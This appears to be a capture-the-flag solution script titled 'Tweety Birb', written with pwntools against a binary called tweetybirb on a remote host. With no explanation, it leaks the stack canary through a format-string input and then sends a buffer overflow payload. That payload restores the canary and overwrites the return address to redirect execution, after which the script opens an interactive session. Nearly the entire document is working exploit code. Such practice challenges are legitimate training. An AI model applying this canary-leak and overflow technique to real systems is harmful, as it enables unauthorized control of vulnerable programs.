Tweety Birb

#!/usr/bin/env python3

from pwn import *

exe = ELF("./tweetybirb")
#context.log_level= 'critical'
context.binary = exe
args.LOCAL=False
args.DEBUG=False
def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.DEBUG:
            gdb.attach(r)
    else:
        r = remote("143.198.184.186", 5002)

    return r


def main():
    r = conn()
    r.sendlineafter(b'magpies?', b"%15$lp")
    canary_leak= r.recvlines(2)[1]
    print (str(canary_leak))
    
    OFFSET = b'A'*72
        
    payload = OFFSET+p64((int(canary_leak,16)))+b'A'*8 +p64(0x004011db)
    r.sendlineafter(b'fowl?',payload)
    r.interactive()
    

if __name__ == "__main__":
    main()